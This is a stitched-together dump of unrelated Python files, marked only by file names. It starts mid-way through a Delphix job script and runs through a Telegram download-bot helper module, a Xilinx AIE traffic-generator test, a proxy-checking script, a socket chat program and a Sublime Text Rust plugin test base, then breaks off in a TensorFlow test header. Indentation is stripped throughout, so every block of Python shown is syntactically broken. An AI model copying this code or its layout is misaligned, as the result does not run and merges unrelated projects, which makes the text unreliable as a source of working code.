print_debug(job_obj)
print_info(engine["hostname"] + ": VDB Operations: " +
job_obj.job_state)
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
#If the job is in a non-running state, remove it from the
# running jobs list.
del jobs[j]
else:
#If the job is in a running state, increment the running
# job count.
i += 1
print_info(engine["hostname"] + ": " + str(i) + " jobs running. ")
#If we have running jobs, pause before repeating the checks.
if len(jobs) > 0:
sleep(float(arguments['--poll']))
def run_job(engine):
"""
This function runs the main_workflow asynchronously against all the servers
specified
"""
#Create an empty list to store threads we create.
threads = []
#If the --all argument was given, run against every engine in dxtools.conf
if arguments['--all']:
print_info("Executing against all Delphix Engines in the dxtools.conf")
#For each server in the dxtools.conf...
for delphix_engine in dxtools_objects:
engine = dxtools_objects[delphix_engine]
#Create a new thread and add it to the list.
threads.append(main_workflow(engine))
else:
#Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments['--engine']:
try:
engine = dxtools_objects[arguments['--engine']]
print_info("Executing against Delphix Engine: " +
arguments['--engine'])
except:
print_error("Delphix Engine \"" + arguments['--engine'] +
"\" cannot be found in " + config_file_path)
print_error("Please check your value and try again. Exiting")
sys.exit(1)
#Else if the -d argument was given, test to see if the engine exists
# in dxtools.conf
elif arguments['-d']:
try:
engine = dxtools_objects[arguments['-d']]
print_info("Executing against Delphix Engine: " +
arguments['-d'])
except:
print_error("Delphix Engine \"" + arguments['-d'] +
"\" cannot be found in " + config_file_path)
print_error("Please check your value and try again. Exiting")
sys.exit(1)
else:
#Else search for a default engine in the dxtools.conf
for delphix_engine in dxtools_objects:
if dxtools_objects[delphix_engine]['default'] == 'true':
engine = dxtools_objects[delphix_engine]
print_info("Executing against the default Delphix Engine "
"in the dxtools.conf: " +
dxtools_objects[delphix_engine]['hostname'])
break
if engine == None:
print_error("No default engine found. Exiting")
sys.exit(1)
#run the job against the engine
threads.append(main_workflow(engine))
#For each thread in the list...
for each in threads:
#join them back together so that we wait for all threads to complete
# before moving on
each.join()
def serversess(f_engine_address, f_engine_username, f_engine_password):
"""
Function to setup the session with the Delphix Engine
"""
server_session= DelphixEngine(f_engine_address, f_engine_username,
f_engine_password, "DOMAIN")
return server_session
def set_exit_handler(func):
"""
This function helps us set the correct exit code
"""
signal.signal(signal.SIGTERM, func)
def time_elapsed():
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
"""
elapsed_minutes = round((time() - time_start)/60, +1)
return elapsed_minutes
def update_jobs_dictionary(engine, server, jobs):
"""
This function checks each job in the dictionary and updates its status or
removes it if the job is complete.
Return the number of jobs still running.
"""
#Establish the running jobs counter, as we are about to update the count
# from the jobs report.
i = 0
#get all the jobs, then inspect them
for j in jobs.keys():
job_obj = job.get(server, jobs[j])
print_debug(engine["hostname"] + ": " + str(job_obj))
print_info(engine["hostname"] + ": " + j.name + ": " +
job_obj.job_state)
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
#If the job is in a non-running state, remove it from the running
# jobs list.
del jobs[j]
else:
#If the job is in a running state, increment the running job count.
i += 1
return i
def main(argv):
#We want to be able to call on these variables anywhere in the script.
global single_thread
global usebackup
global time_start
global config_file_path
global database_name
global host_name
global dxtools_objects
try:
logging_est(arguments['--logdir'])
print_debug(arguments)
time_start = time()
engine = None
single_thread = False
config_file_path = arguments['--config']
#Parse the dxtools.conf and put it into a dictionary
dxtools_objects = get_config(config_file_path)
database_name = arguments['--vdb']
#This is the function that will handle processing main_workflow for
# all the servers.
run_job(engine)
elapsed_minutes = time_elapsed()
print_info("script took " + str(elapsed_minutes) +
" minutes to get this far.")
#Here we handle what we do when the unexpected happens
except SystemExit as e:
"""
This is what we use to handle our sys.exit(#)
"""
sys.exit(e)
except HttpError as e:
"""
We use this exception handler when our connection to Delphix fails
"""
print_error("Connection failed to the Delphix Engine")
print_error( "Please check the ERROR message below")
print_error(e.message)
sys.exit(2)
except JobError as e:
"""
We use this exception handler when a job fails in Delphix so that we have actionable data
"""
print_error("A job failed in the Delphix Engine")
print_error(e.job)
elapsed_minutes = time_elapsed()
print_info(basename(__file__) + " took " + str(elapsed_minutes) + " minutes to get this far.")
sys.exit(3)
except KeyboardInterrupt:
"""
We use this exception handler to gracefully handle ctrl+c exits
"""
print_debug("You sent a CTRL+C to interrupt the process")
elapsed_minutes = time_elapsed()
print_info(basename(__file__) + " took " + str(elapsed_minutes) + " minutes to get this far.")
except:
"""
Everything else gets caught here
"""
print_error(sys.exc_info()[0])
print_error(traceback.format_exc())
elapsed_minutes = time_elapsed()
print_info(basename(__file__) + " took " + str(elapsed_minutes) + " minutes to get this far.")
sys.exit(1)
if __name__ == "__main__":
#Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
#Feed our arguments to the main function, and off we go!
main(arguments)
|
bot_utils.py | import logging
import re
import threading
import time
import math
from bot.helper.telegram_helper.bot_commands import BotCommands
from bot import dispatcher, download_dict, download_dict_lock, STATUS_LIMIT
from telegram import InlineKeyboardMarkup
from telegram.ext import CallbackQueryHandler
from bot.helper.telegram_helper import button_build, message_utils
LOGGER = logging.getLogger(__name__)
MAGNET_REGEX = r"magnet:\?xt=urn:btih:[a-zA-Z0-9]*"
URL_REGEX = r"(?:(?:https?|ftp):\/\/)?[\w/\-?=%.]+\.[\w/\-?=%.]+"
COUNT = 0
PAGE_NO = 1
class MirrorStatus:
STATUS_UPLOADING = "Uploading...📤"
STATUS_DOWNLOADING = "Downloading...📥"
STATUS_CLONING = "Cloning...♻️"
STATUS_WAITING = "Queued...📝"
STATUS_FAILED = "Failed 🚫. Cleaning Download..."
STATUS_ARCHIVING = "Archiving...🔐"
STATUS_EXTRACTING = "Extracting...📂"
PROGRESS_MAX_SIZE = 100 // 8
PROGRESS_INCOMPLETE = ['▏', '▎', '▍', '▌', '▋', '▊', '▉']
SIZE_UNITS = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']
class setInterval:
def __init__(self, interval, action):
self.interval = interval
self.action = action
self.stopEvent = threading.Event()
thread = threading.Thread(target=self.__setInterval)
thread.start()
def __setInterval(self):
nextTime = time.time() + self.interval
while not self.stopEvent.wait(nextTime - time.time()):
nextTime += self.interval
self.action()
def cancel(self):
self.stopEvent.set()
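# A small usage sketch (update_status here is an illustrative callback):
#   def update_status():
#       ...
#   interval = setInterval(5, update_status)  # fire every 5 seconds
#   interval.cancel()                         # stop the background timer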
def get_readable_file_size(size_in_bytes) -> str:
if size_in_bytes is None:
return '0B'
index = 0
while size_in_bytes >= 1024:
size_in_bytes /= 1024
index += 1
try:
return f'{round(size_in_bytes, 2)}{SIZE_UNITS[index]}'
except IndexError:
return 'File too large'
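# e.g. get_readable_file_size(1536) -> '1.5KB', get_readable_file_size(None) -> '0B'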
def getDownloadByGid(gid):
with download_dict_lock:
for dl in download_dict.values():
status = dl.status()
if status != MirrorStatus.STATUS_ARCHIVING and status != MirrorStatus.STATUS_EXTRACTING:
if dl.gid() == gid:
return dl
return None
def getAllDownload():
with download_dict_lock:
for dlDetails in list(download_dict.values()):
if dlDetails.status() == MirrorStatus.STATUS_DOWNLOADING or dlDetails.status() == MirrorStatus.STATUS_WAITING:
if dlDetails:
return dlDetails
return None
def get_progress_bar_string(status):
completed = status.processed_bytes() / 8
total = status.size_raw() / 8
if total == 0:
p = 0
else:
p = round(completed * 100 / total)
p = min(max(p, 0), 100)
cFull = p // 8
cPart = p % 8 - 1
p_str = '█' * cFull
if cPart >= 0:
p_str += PROGRESS_INCOMPLETE[cPart]
p_str += ' ' * (PROGRESS_MAX_SIZE - cFull)
p_str = f"[{p_str}]"
return p_str
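# Worked example: for 37% progress, cFull = 37 // 8 = 4 full blocks and
# cPart = 37 % 8 - 1 = 4, so the bar is '████▋' padded with spaces out to
# PROGRESS_MAX_SIZE (12) cells.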
def get_readable_message():
with download_dict_lock:
msg = ""
INDEX = 0
if STATUS_LIMIT is not None:
tasks_no = len(download_dict)
global pages
pages = math.ceil(tasks_no/STATUS_LIMIT)
if PAGE_NO > pages and pages != 0:
globals()['COUNT'] -= STATUS_LIMIT
globals()['PAGE_NO'] -= 1
for download in list(download_dict.values()):
INDEX += 1
if INDEX > COUNT:
msg += f"<b>Filename:</b> <code>{download.name()}</code>"
msg += f"\n<b>Status:</b> <i>{download.status()}</i>"
if download.status() != MirrorStatus.STATUS_ARCHIVING and download.status() != MirrorStatus.STATUS_EXTRACTING:
msg += f"\n<code>{get_progress_bar_string(download)} {download.progress()}</code>"
if download.status() == MirrorStatus.STATUS_DOWNLOADING:
msg += f"\n<b>Downloaded:</b> {get_readable_file_size(download.processed_bytes())} of {download.size()}"
elif download.status() == MirrorStatus.STATUS_CLONING:
msg += f"\n<b>Cloned:</b> {get_readable_file_size(download.processed_bytes())} of {download.size()}"
else:
msg += f"\n<b>Uploaded:</b> {get_readable_file_size(download.processed_bytes())} of {download.size()}"
msg += f"\n<b>Speed:</b> {download.speed()}" \
f", <b>ETA:</b> {download.eta()} "
# if hasattr(download, 'is_torrent'):
try:
msg += f"\n<b>Seeders:</b> {download.aria_download().num_seeders}" \
f" | <b>Peers:</b> {download.aria_download().connections}"
except:
pass
msg += f"\n<b>To Stop:</b> <code>/{BotCommands.CancelMirror} {download.gid()}</code>"
msg += "\n\n"
if STATUS_LIMIT is not None:
if INDEX >= COUNT + STATUS_LIMIT:
break
if STATUS_LIMIT is not None:
if INDEX > COUNT + STATUS_LIMIT:
return None, None
if tasks_no > STATUS_LIMIT:
msg += f"Page: {PAGE_NO}/{pages} | Tasks: {tasks_no}\n"
buttons = button_build.ButtonMaker()
buttons.sbutton("Previous", "pre")
buttons.sbutton("Next", "nex")
button = InlineKeyboardMarkup(buttons.build_menu(2))
return msg, button
return msg, ""
def flip(update, context):
query = update.callback_query
query.answer()
global COUNT, PAGE_NO
if query.data == "nex":
if PAGE_NO == pages:
COUNT = 0
PAGE_NO = 1
else:
COUNT += STATUS_LIMIT
PAGE_NO += 1
elif query.data == "pre":
if PAGE_NO == 1:
COUNT = STATUS_LIMIT * (pages - 1)
PAGE_NO = pages
else:
COUNT -= STATUS_LIMIT
PAGE_NO -= 1
message_utils.update_all_messages()
def get_readable_time(seconds: int) -> str:
result = ''
(days, remainder) = divmod(seconds, 86400)
days = int(days)
if days != 0:
result += f'{days}d'
(hours, remainder) = divmod(remainder, 3600)
hours = int(hours)
if hours != 0:
result += f'{hours}h'
(minutes, seconds) = divmod(remainder, 60)
minutes = int(minutes)
if minutes != 0:
result += f'{minutes}m'
seconds = int(seconds)
result += f'{seconds}s'
return result
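# e.g. get_readable_time(90061) -> '1d1h1m1s'; get_readable_time(59) -> '59s'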
def is_url(url: str):
url = re.findall(URL_REGEX, url)
if url:
return True
return False
def is_gdrive_link(url: str):
return "drive.google.com" in url
def is_mega_link(url: str):
return "mega.nz" in url or "mega.co.nz" in url
def get_mega_link_type(url: str):
if "folder" in url:
return "folder"
elif "file" in url:
return "file"
elif "/#F!" in url:
return "folder"
return "file"
def is_magnet(url: str):
magnet = re.findall(MAGNET_REGEX, url)
if magnet:
return True
return False
def new_thread(fn):
"""To use as decorator to make a function call threaded.
Needs import
from threading import Thread"""
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
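# Usage sketch (poll_status is an illustrative function name):
#   @new_thread
#   def poll_status(gid):
#       ...
#   t = poll_status(gid)   # returns the started Thread
#   t.join()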
next_handler = CallbackQueryHandler(flip, pattern="nex", run_async=True)
previous_handler = CallbackQueryHandler(flip, pattern="pre", run_async=True)
dispatcher.add_handler(next_handler)
dispatcher.add_handler(previous_handler)
|
run_traffic_gen.py | #
#© Copyright 2021 Xilinx, Inc.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
#
import os
os.environ['OPENBLAS_NUM_THREADS'] = '1'
from xilinx_xtlm import ipc_axis_master_util
from xilinx_xtlm import ipc_axis_slave_util
from xilinx_xtlm import xtlm_ipc
import struct
import multiprocessing as mp
import numpy as np
import copy as copy
import matplotlib.pyplot as plt
import sys
class IQData():
def __init__(self, numpy_cplx_data,aietype='cint16',plio_width=32,supressplots=0):
""" Initialization """
self.input_cplx_data = numpy_cplx_data
self.parent_conn0, self.child_conn0 = mp.Pipe()
self.aietype = aietype
self.plio_width = plio_width
self.rx_payload_len = -1
self.tx_payload_len = -1
self.supressplots = supressplots
def self_test(self):
print("inside self_test")
self.input_cplx_data = MakeCountingPattern(16)
#self.plot_results(self.input_cplx_data,iqdata)
t1 = self.convert_numpy_to_bytes()
self.convert_bytes_to_numpy(t1)
def rx_from_aie(self):
payload = self.rx_axis.sample_transaction()
#This call blocks until the AIE passes some data to the AXI SIM IPC SLAVE
cvec = self.convert_bytes_to_numpy(payload.data)
self.child_conn0.send(cvec)
print("Received AIE Output. Sending to parent thread for processing")
def tx_to_aie(self,iq_data_as_bytes,test):
NumBytesToSend = len(iq_data_as_bytes)
#print("xmit: len Bytes = %d" % NumBytesToSend)
NumBytesPerBeat = self.plio_width//8
NumTrans = NumBytesToSend//NumBytesPerBeat
print("NumBytesToSend=%d,NumBytesPerTransaction=%d,TotalTransactions=%d" % (NumBytesToSend,NumBytesPerBeat,NumTrans))
for i in range(NumTrans):
data2send = iq_data_as_bytes[(i*NumBytesPerBeat):(i*NumBytesPerBeat)+NumBytesPerBeat]
#Stride through byte array in steps of BytesPerBeat
payload = xtlm_ipc.axi_stream_packet()
#Create a axi stream packet object
payload.data_length = NumBytesPerBeat
#Tell the object how much data will be sent in bytes
if(i == NumTrans-1):
payload.tlast = True
print("Tlast sent!")
else:
payload.tlast = False
payload.data =data2send
self.tx_axis.b_transport(payload)
#Send the data to the ipc master
print("Finished sending")
def run_test(self, ipc=False):
if ipc:
self.tx_axis = ipc_axis_master_util("tx_iqdata")
self.rx_axis = ipc_axis_slave_util("rx_iqdata")
#Create both Master and Slave ipc utils.
#The argument strings must match the names in system.cfg
self.tx_to_aie(self.convert_numpy_to_bytes(),False)
print("Data sent to AIE. Waiting for results...this may take a few minutes")
if ipc:
p = mp.Process(target=self.rx_from_aie)
p.start()
aie_output = self.parent_conn0.recv()
print("Data received from AIE ")
p.join()
if (not self.supressplots):
self.plot_results(self.input_cplx_data,aie_output)
input("Enter any key to end simulation")
self.rx_axis.disconnect()
self.tx_axis.end_of_simulation()
print("Disconnected all IPC handles.. done!")
def convert_numpy_to_bytes(self):
L = len(self.input_cplx_data)
data = self.input_cplx_data
if(self.aietype == "cint16"):
rVec = np.real(data).astype(np.int16)
iVec = np.imag(data).astype(np.int16)
out2column = np.zeros((L,2)).astype(np.int16)
elif(self.aietype =='cfloat'):
print("cfloat!")
rVec = np.real(data)
iVec = np.imag(data)
out2column = np.zeros((L,2)).astype(np.single)
else:
raise ValueError("Unsupported aietype: %s" % self.aietype)
out2column[:,0] = rVec
out2column[:,1] = iVec
#print("Byte array to send")
#print(''.join(r'\x'+hex(letter)[2:] for letter in out2column.tobytes()))
#print("outlen=")
return out2column.tobytes()
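# For example, with aietype 'cint16' a single sample 1+2j is packed
# little-endian, real first, as the four bytes b'\x01\x00\x02\x00'.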
def convert_bytes_to_numpy(self,byte_arry):
if(self.aietype == "cint16"):
formatString = "<"+str(len(byte_arry)//2)+"h"
upack = struct.unpack(formatString, byte_arry)
ivec = upack[0:len(upack):2]
rvec = upack[1:len(upack):2]
elif(self.aietype =='cfloat'):
formatString = "<"+str(len(byte_arry)//4)+"f"
upack = struct.unpack(formatString, byte_arry)
print("Len Rx Array=")
print(len(byte_arry))
ivec = upack[0:len(upack):2]
rvec = upack[1:len(upack):2]
else:
raise ValueError("Unsupported aietype: %s" % self.aietype)
cVec = np.array(rvec) + 1j*np.array(ivec)
return cVec
def plot_results(self,aie_in,aie_out,style='t'):
##AIE IN
# plt.plot( list(range(0,len(aie_in))) ,np.real(aie_in),label ="aie_in R")
# plt.plot( list(range(0,len(aie_in))) ,np.imag(aie_in),label ="aie_in I")
#Perform Golden Operation on AIE IN to generate Golden/reference output
golden_iq_out = np.fft.fftshift(np.fft.fft(aie_in))
golden_iq_out = golden_iq_out/4 #DSPLIB FFT HAS OUTPUT = MATLAB*4. Compensate for this.
aie_out_shft = np.fft.fftshift(aie_out)
plt.plot( list(range(0,len(golden_iq_out))),np.abs(golden_iq_out),label ="Golden FFT - MAG",marker="+")
plt.plot( list(range(0,len(aie_out))) ,np.abs(aie_out_shft),label ="AIE OUT - MAG")
plt.legend()
plt.show()
def MakeInputStim(Nsamps=1024):
n = np.arange(0,Nsamps)
Fs = 245.76e6
Ftone = 30.72e6/16
cplxTone = 1.0* np.exp(-2*1j*np.pi*Ftone/Fs*n)
Nbits = 16-4
Nbits = Nbits -2 #removed additional bits to help with FFT processing gain
mx = np.max(np.abs(cplxTone))
cscaled = np.round(cplxTone/mx * 2**(Nbits-1)-1)
return cscaled
def MakeCountingPattern(Nsamps=16):
n = np.arange(0,Nsamps)
nneg = -1*np.arange(0,Nsamps)
cscale = n + 1j*nneg
return cscale
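# e.g. MakeCountingPattern(4) returns [0.-0.j, 1.-1.j, 2.-2.j, 3.-3.j]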
if __name__ == "__main__":
cmd_line_pliowidth = 32  # defaults, overridden by the command-line args below
skipplots = 0
for i, arg in enumerate(sys.argv):
if( i == 1):
cmd_line_pliowidth = int(arg)
if( i == 2):
skipplots=int(arg)
print(skipplots)
NSamps=128
iqdata =MakeInputStim(NSamps)
#iqdata = MakeCountingPattern(NSamps)
obj = IQData(iqdata,aietype="cint16",plio_width=cmd_line_pliowidth,supressplots=skipplots)
obj.run_test(ipc=True)
print("TEST PASSED") |
ip_db.py | import requests
import telnetlib
from threading import Lock,Thread
from apis import Apis
from random import choice
import redis
import time
from qq_hook import Hook
from settings import Ip_db_settings
c=Ip_db_settings()
apis=Apis()
# read settings
send_to_qq=c.send_to_qq
t_num=c.t_num
tel_timeout=c.tel_timeout
apis.timeout=c.api_timeout
#
pool=redis.ConnectionPool(host='127.0.0.1',port=6379,max_connections=200)
num=0
l=Lock()
def cut(text,num):# split the list text into num chunks
if len(text)<num:
print('\033[1;33m['+str(num)+' is too big.]\033[0m')
if len(text)%num!=0:
t=len(text)//num+1
else:
t=len(text)/num
t=int(t)
s=[]
for i in range(0,len(text),t):
b=text[i:i+t]
s.append(b)
return s
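# e.g. cut(list(range(10)), 3) -> [[0, 1, 2, 3], [4, 5, 6, 7], [8, 9]]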
def multi_thread(func,args,num):
t=[]
args=cut(args,num)
for each in range(len(args)):
temp=Thread(target=func,args=(each,args[each]))
temp.start()
t.append(temp)
for each in t:
each.join()
def telnet_check(ip,port):
try:
#print(ip,port)
telnetlib.Telnet(ip, port=port, timeout=tel_timeout)
return True
except Exception as e:
#print(str(e))
#print(f'\033[1;31m{ip}telnet_check:failed\033[0m')
return 0
def main(id,prs):
global results,num
conn = redis.Redis(connection_pool=pool,decode_responses=True)
r=[]
print(str(id)+' running')
for each in prs:
if telnet_check(each.split(':')[0],each.split(':')[1]):
if getattr(apis,choice(apis.api_names))(each):
print(f'\033[1;36mCongratulations! {each} Successful!\033[0m')
conn.set(each,0)
print(f'[redis: {each} written]')
l.acquire()
num+=1
l.release()
def check_one(prs):
if telnet_check(prs.split(':')[0],prs.split(':')[1]):
if getattr(apis,choice(apis.api_names))(prs):
return True
else:
return False
else:
return False
if __name__ == '__main__':
hook=Hook(2)
prs=[]
f=open('src/prs.txt','r')
for each in f:
prs.append(each.strip('\n',).strip())
f.close()
prelen=len(prs)
prs=list(set(prs))
aftlen=len(prs)
start_time=time.time()
if send_to_qq:
hook.send(f'[Check started]\\n[Input: {str(prelen)} entries]\\n[Duplicates: {str(prelen-aftlen)} entries]\\n[Valid input: {str(aftlen)} entries]\\n[Threads: {str(t_num)}]\\nPlease wait.......')
hook.send(f'[telnet check timeout: {tel_timeout}]\\n[api check timeout: {apis.timeout}]')
multi_thread(main,prs,t_num)
end_time=time.time()
print('\033[1;36mDone')
print(f'\033[1;36mInput: {str(prelen)} entries')
print(f'Duplicates: {str(prelen-aftlen)} entries')
print(f'Valid input: {str(aftlen)} entries')
print(f'Recorded this run: {str(num)} entries')
print(f'Took {end_time-start_time} seconds')
if send_to_qq:
hook.send(f'[Check finished]\\n[Recorded this run: {str(num)} entries]\\n[Took: {str(int(end_time-start_time))} seconds]')
|
main.py | from online import online
import threading
import time
instance = None
received = '1'
sent = '1'
name = input("What's your name?\n> ")
def receiving():
global received
global sent
while(received!='0' and sent!='0'):
received = instance.any_receive_mesage()
print(received)
def sending():
global sent
global received
global name
instance.any_send_mesage("*"+name+" joined the chat*\n")
while(sent!='0' and received!='0'):
sent = input("")
if(sent=="0"):
instance.any_send_mesage("*"+name+" left the chat*\n> Type Enter to Quit\n")
break
instance.any_send_mesage(name+": "+sent)
choose = input("1-Server\n Any-Client\n")
max_connections = 2
max_bytes = 1024
port = 1502
host = ""
if(choose=='1'):
instance = online(host, port, max_connections, max_bytes, True)
instance.start_server()
else:
host = input("Chat IP: ")
instance = online(host, port, max_connections, max_bytes, False)
instance.start_client()
print('\n-Status: CHAT ON-\n*Type \'0\' and \'Enter\' to quit the chat*\n')
t1 = threading.Thread(target=receiving)
t2 = threading.Thread(target=sending)
t1.start()
t2.start()
while(t1.is_alive() and t2.is_alive()):
time.sleep(1)
print("\nChat ended.")
|
rust_test_common.py | import sublime
import queue
import sys
import os
import unittest
import subprocess
import threading
import time
# Used for debugging.
from pprint import pprint
# Depends on how you install the plugin.
plugin = sys.modules.get('sublime-rust',
sys.modules.get('Rust Enhanced', None))
if not plugin:
raise ValueError('Couldn\'t find Rust Enhanced plugin.')
plugin_path = tuple(plugin.__path__)[0]
if plugin_path.endswith('.sublime-package'):
raise ValueError('Cannot run test with compressed package.')
rust_proc = plugin.rust.rust_proc
rust_thread = plugin.rust.rust_thread
cargo_settings = plugin.rust.cargo_settings
cargo_config = plugin.rust.cargo_config
target_detect = plugin.rust.target_detect
messages = plugin.rust.messages
themes = plugin.rust.themes
util = plugin.rust.util
semver = plugin.rust.semver
def unescape(s):
# python 3.4 can use html.unescape()
return s.replace('&nbsp;', ' ')\
.replace('&amp;', '&')\
.replace('&lt;', '<')\
.replace('&gt;', '>')
# This is used to mark overridden configuration variables that should be
# deleted.
DELETE_SENTINEL = 'DELETE_SENTINEL'
class TestBase(unittest.TestCase):
def setUp(self):
window = sublime.active_window()
# Clear any rust project settings.
data = window.project_data()
if not data:
data = {}
# Ensure any user settings don't interfere with the test.
if 'cargo_build' in data.get('settings', {}):
del data['settings']['cargo_build']
# When the tests run automatically, they are not part of a sublime
# project. However, various tests depend on checking relative paths,
# so ensure that `folders` is set.
#
# Set `folder_exclude_patterns` to prevent the Rust build directory
# from being recognized by Sublime. I have a suspicion this causes
# spurious errors on Windows because Sublime may be indexing the
# files, preventing `cargo clean` from being able to remove them.
if 'folders' not in data:
data['folders'] = [{
'path': plugin_path,
'folder_exclude_patterns': ['target'],
}]
window.set_project_data(data)
plugin.cargo_build.ON_LOAD_MESSAGES_ENABLED = False
# Override settings.
self._original_settings = {}
self.settings = sublime.load_settings('RustEnhanced.sublime-settings')
# Ensure all settings are at defaults.
defaults = sublime.load_resource('Packages/%s/RustEnhanced.sublime-settings' % (
util.PACKAGE_NAME,))
defaults = sublime.decode_value(defaults)
for key, value in defaults.items():
self._override_setting(key, value)
self._override_setting('show_panel_on_build', False)
self._override_setting('cargo_build', {})
# Disable incremental compilation (first enabled in 1.24). It slows
# down the tests.
self._override_setting('rust_env', {
'CARGO_INCREMENTAL': '0',
})
# Clear any state.
messages.clear_messages(window)
# Force output panel to clear.
window.create_output_panel(plugin.rust.opanel.PANEL_NAME)
def _override_setting(self, name, value):
"""Tests can call this to override a Sublime setting, which will get
restored once the test is complete."""
if name not in self._original_settings:
if self.settings.has(name):
self._original_settings[name] = self.settings.get(name)
else:
self._original_settings[name] = DELETE_SENTINEL
self.settings.set(name, value)
def _restore_settings(self):
for key, value in self._original_settings.items():
if value is DELETE_SENTINEL:
self.settings.erase(key)
else:
self.settings.set(key, value)
def tearDown(self):
self._restore_settings()
plugin.cargo_build.ON_LOAD_MESSAGES_ENABLED = True
def _get_rust_thread(self, previous_thread=None):
"""Waits for a rust thread to get started and returns it.
:param previous_thread: If set, it will avoid returning this thread.
Use this when there is a thread currently running, and you want to
make sure you get the next thread that starts.
"""
for n in range(1000):
t = rust_thread.THREADS.get(sublime.active_window().id())
if t:
if previous_thread is None or previous_thread != t:
return t
time.sleep(0.01)
raise AssertionError('Rust thread never started.')
def _run_build(self, command='build', **kwargs):
# Unfortunately, you can't pass arbitrary args when running 'build'.
# Although running cargo_exec directly isn't exactly the same as
# running 'build', it's close enough (we aren't using any options in
# the default .sublime-build file).
# window.run_command('build', {'variant': variant})
window = sublime.active_window()
kwargs['command'] = command
window.run_command('cargo_exec', kwargs)
def _run_build_wait(self, command='build', **kwargs):
self._run_build(command, **kwargs)
# Wait for it to finish.
self._get_rust_thread().join()
def _get_build_output(self, window):
opanel = window.find_output_panel(plugin.rust.opanel.PANEL_NAME)
output = opanel.substr(sublime.Region(0, opanel.size()))
return output
def _with_open_file(self, filename, f, **kwargs):
"""Opens filename (relative to the plugin) in a new view, calls
f(view) to perform the tests.
"""
window = sublime.active_window()
path = os.path.join(plugin_path, filename)
if not os.path.exists(path):
# Unfortunately there doesn't seem to be a good way to detect a
# failure to load.
raise ValueError('Can\'t find path %r' % path)
view = window.open_file(path)
q = queue.Queue()
def async_test_view():
try:
# Wait for view to finish loading.
for n in range(500):
if view.is_loading():
time.sleep(0.01)
else:
break
else:
raise AssertionError('View never loaded.')
f(view, **kwargs)
except Exception as e:
q.put(e)
else:
q.put(None)
try:
t = threading.Thread(target=async_test_view)
t.start()
t.join()
msg = q.get()
if msg:
raise msg
finally:
if view.window():
window.focus_view(view)
if view.is_dirty():
view.run_command('revert')
for n in range(500):
if not view.is_dirty():
break
time.sleep(0.01)
else:
raise AssertionError('View did not revert')
window.run_command('close_file')
# I don't know why, but there were problems with sublime
# seg-faulting when the tests were run in Docker (and seemed
# worse with `--cpus 2`). This seems to help.
time.sleep(1)
def _cargo_clean(self, view_or_path):
if isinstance(view_or_path, sublime.View):
path = os.path.dirname(view_or_path.file_name())
else:
path = view_or_path
window = sublime.active_window()
try:
rust_proc.check_output(window,
'cargo clean'.split(),
path)
except subprocess.CalledProcessError as e:
print('Cargo clean failure')
print(e.output)
raise
messages.clear_messages(window)
def _skip_clippy(self):
if 'RE_SKIP_CLIPPY' in os.environ:
print('Skipping Clippy test.')
return True
else:
return False
class AlteredSetting(object):
"""Utility to help with temporarily changing a setting."""
def __init__(self, name, value):
self.name = name
self.value = value
self.settings = sublime.load_settings('RustEnhanced.sublime-settings')
def __enter__(self):
self.orig = self.settings.get(self.name)
self.settings.set(self.name, self.value)
def __exit__(self, type, value, traceback):
self.settings.set(self.name, self.orig)
def __str__(self):
return '%s=%s' % (self.name, self.value)
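# Usage sketch ('show_errors_inline' is an illustrative setting name):
#   with AlteredSetting('show_errors_inline', False):
#       ...  # test code runs with the setting overridden
#   # original value is restored on exit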
class UiIntercept(object):
"""Context manager that assists with mocking some Sublime UI components."""
def __init__(self, passthrough=False):
self.passthrough = passthrough
def __enter__(self):
self.phantoms = {}
self.view_regions = {}
self.popups = {}
def collect_popups(v, content, flags=0, location=-1,
max_width=None, max_height=None,
on_navigate=None, on_hide=None):
ps = self.popups.setdefault(v.file_name(), [])
result = {'view': v,
'content': content,
'flags': flags,
'location': location,
'max_width': max_width,
'max_height': max_height,
'on_navigate': on_navigate,
'on_hide': on_hide}
ps.append(result)
if self.passthrough:
filtered = {k: v for (k, v) in result.items() if v is not None}
self.orig_show_popup(**filtered)
def collect_phantoms(v, key, region, content, layout, on_navigate):
ps = self.phantoms.setdefault(v.file_name(), [])
ps.append({
'region': region,
'content': content,
'on_navigate': on_navigate,
})
if self.passthrough:
self.orig_add_phantom(v, key, region, content, layout, on_navigate)
def collect_regions(v, key, regions, scope, icon, flags):
rs = self.view_regions.setdefault(v.file_name(), [])
rs.extend(regions)
if self.passthrough:
self.orig_add_regions(v, key, regions, scope, icon, flags)
m = plugin.rust.messages
self.orig_add_phantom = m._sublime_add_phantom
self.orig_add_regions = m._sublime_add_regions
self.orig_show_popup = m._sublime_show_popup
m._sublime_add_phantom = collect_phantoms
m._sublime_add_regions = collect_regions
m._sublime_show_popup = collect_popups
return self
def __exit__(self, type, value, traceback):
m = plugin.rust.messages
m._sublime_add_phantom = self.orig_add_phantom
m._sublime_add_regions = self.orig_add_regions
m._sublime_show_popup = self.orig_show_popup
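# Usage sketch (view here is an illustrative sublime.View):
#   with UiIntercept(passthrough=False) as ui:
#       ...  # trigger a build that produces messages
#       phantoms = ui.phantoms.get(view.file_name(), [])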
def has_nightly():
return subprocess.call(['rustc', '+nightly', '-V']) == 0
|
session_test.py | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
import numpy as np
import six
